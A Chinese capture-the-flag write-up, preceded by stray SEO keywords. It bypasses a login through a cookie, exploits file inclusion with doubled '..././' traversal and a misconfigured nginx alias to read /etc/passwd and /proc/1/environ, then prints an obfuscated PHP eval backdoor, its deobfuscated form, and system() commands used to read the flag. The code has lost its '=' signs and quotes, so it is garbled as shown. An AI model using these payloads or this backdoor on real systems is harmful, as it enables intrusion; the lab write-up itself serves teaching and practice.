网站建设市区,中国建筑资料网,长沙品牌推广公司,建设企业网站个人网银这题考察了绕过登录、目录浏览、后门利用
进来先是一个登录框#xff0c;随便怎么输前端都直接弹窗 禁用js后再输入后登录
查看源码#xff0c;好家伙#xff0c;不管输什么都进不去 直接扫目录 访问/robots.txt 访问/hint.php 访问/Hack.php 抓包看一下 cookie里isLogin0…这题考察了绕过登录、目录浏览、后门利用
进来先是一个登录框随便怎么输前端都直接弹窗 禁用js后再输入后登录
查看源码好家伙不管输什么都进不去 直接扫目录 访问/robots.txt 访问/hint.php 访问/Hack.php 抓包看一下 cookie里isLogin0改为1
发包发现成功登录
改下cookie 点击管理中心发现url改变意思存在任意文件包含
同时页眉多了please continue提示我们路子对了 这里太明显了file就是文件名ext是文件后缀 尝试直接读环境变量但无回显
?filefile:///proc/1/environext
?filefile:///etc/passwdext 经过尝试发现../被替换为空
?file./index.php回显正常。再输入../index.php仍显回显正常可能../被替换为空尝试inde../x.php发现回显仍然正常印证猜想
双写绕过即可..././
?file..././..././..././..././..././etc/passwdext 结合hint.php
?file..././..././..././..././..././etc/nginx/sites-enabled/site.confext
拿到配置文件内容 server {listen 8080; ## listen for ipv4; this line is default and impliedlisten [::]:8080; ## listen for ipv6root /var/www/html;index index.php index.html index.htm;port_in_redirect off;server_name _;# Make site accessible from http://localhost/#server_name localhost;# If block for setting the time for the logfileif ($time_iso8601 ~ ^(\d{4})-(\d{2})-(\d{2})) {set $year $1;set $month $2;set $day $3;}# Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.htmlsendfile off;set $http_x_forwarded_for_filt $http_x_forwarded_for;if ($http_x_forwarded_for_filt ~ ([0-9]\.[0-9]\.[0-9]\.)[0-9]) {set $http_x_forwarded_for_filt $1???;}# Add stdout loggingaccess_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log;error_log /var/log/nginx/error.log info;location / {# First attempt to serve request as file, then# as directory, then fall back to index.htmltry_files $uri $uri/ /index.php?q$uri$args;server_tokens off;}#error_page 404 /404.html;# redirect server error pages to the static page /50x.html#error_page 500 502 503 504 /50x.html;location /50x.html {root /usr/share/nginx/html;}location ~ \.php$ {try_files $uri $uri/ /index.php?q$uri$args;fastcgi_split_path_info ^(.\.php)(/.)$;fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_param SCRIPT_NAME $fastcgi_script_name;fastcgi_index index.php;include fastcgi_params;fastcgi_param REMOTE_ADDR $http_x_forwarded_for;}location ~ /\. {log_not_found off;deny all;}location /web-img {alias /images/;autoindex on;}location ~* \.(ini|docx|pcapng|doc)$ { deny all; } include /var/www/nginx[.]conf;
}
注意这里
location /web-img { alias /images/; autoindex on; } 这里 设置了 /web-img 为 /images/ 的别名autoindex on 开启了目录遍历则存在 目录穿越
直接访问根目录/web-img../ 访问/web-img../proc/1/environ
下载附件发现啥也没有读环境变量的执念
找到hack.php.bak访问下载附件
?php
$U_/|U,/-/|U),ar|Uray|U(/|U,),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|Uo|Ub_get_|Ucontents(|U);|Uob_end_cle;
$qs[|U$i];$p|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].|U$p|U;|U$e|Ustrpos($s[$i],$f);|Ui;
$Mlstrtolower|U;$i$m|U[1|U][0].$m[1]|U[1];$|U|Uh$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f$s|Ul($ss(|Umd5($i.$;
$zr$r[|UHTTP_R|UEFERER|U];$r|U|Ua$r[HTTP_A|U|UCCEPT_LAN|UGUAGE|U];if|U($r|Ur|U$ra){$uparse_|Uurl($r;
$k?:;q0.([\\|Ud]))?,|U?/,$ra,$m)|U;if($|Uq$m){|U|U|Usession_start()|U|U;$s$_SESSIO|UN;$ss|Usubst|Ur;|U|U$s;
$o|U$l;|U){for|U($j0;($j|U$c|U|U$i|U$|Ul);$j,$i){$o.$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r$|U_SERV|UE|UR;$r;
$N|Uf($e){$k$k|Uh.$kf|U;ob_sta|Urt();|Ueva|Ul(g|Uzuncom|Upress(x(|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray(/;
$Can();$db|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut(|U$k$d/$k|U);ses|U|Usion_des|Utroy();}}}};
$j$k|Uh|U|U42f7;$kfe9ac;fun|Uction|U |Ux($t,$k){$c|U|Ustrlen($k);$ls|Utrl|Ue|Un($t);$o|U;fo|Ur($i0;$i;
$Rstr_replace(rO,,rOcreatrOe_rOrOfurOncrOtion);
$Jkf|U),|U0,3));$p|U;for(|U|U$|Uz1;$zcou|Unt|U($m[1]);|U$z)$p.|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U0){$;
$xr)|U;pa|Urse|U_str($u[qu|U|Uery],$q);$|U|Uqarray_values(|U$q);pre|Ug|U_match_al|Ul(/([\\|U|Uw])[|U\\w-]|U(;
$fstr_replace(|U,,$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
$gcreate_function(,$f);
$g();
? 代码经过了混淆加密echo $f;即可
再用美化工具处理一下
?php
$kh42f7;
$kfe9ac;
function x($t,$k) {$cstrlen($k);$lstrlen($t);$o;for ($i0;$i$l;) {for ($j0;($j$c$i$l);$j,$i) {$o.$t {$i}^$k {$j};}}return $o;
}
$r$_SERVER;
$rr$r[HTTP_REFERER];
$ra$r[HTTP_ACCEPT_LANGUAGE];
if($rr$ra) {$uparse_url($rr);parse_str($u[query],$q);$qarray_values($q);preg_match_all(/([\w])[\w-](?:;q0.([\d]))?,?/,$ra,$m);if($q$m) {session_start();$s$_SESSION;$sssubstr;$slstrtolower;$i$m[1][0].$m[1][1];$h$sl($ss(md5($i.$kh),0,3));$f$sl($ss(md5($i.$kf),0,3));$p;for ($z1;$zcount($m[1]);$z)$p.$q[$m[2][$z]];if(strpos($p,$h)0) {$s[$i];$p$ss($p,3);}if(array_key_exists($i,$s)) {$s[$i].$p;$estrpos($s[$i],$f);if($e) {$k$kh.$kf;ob_start();eval(gzuncompress(x(base64_decode(preg_replace(array(/_/,/-/),array(/,),$ss($s[$i],0,$e))),$k)));$oob_get_contents();ob_end_clean();$dbase64_encode(x(gzcompress($o),$k));print($k$d/$k);session_destroy();}}}
} 分析文章
我的评价是不多纠结直接拿脚本打了
system(ls);
system(cat fllla4aggg.php);
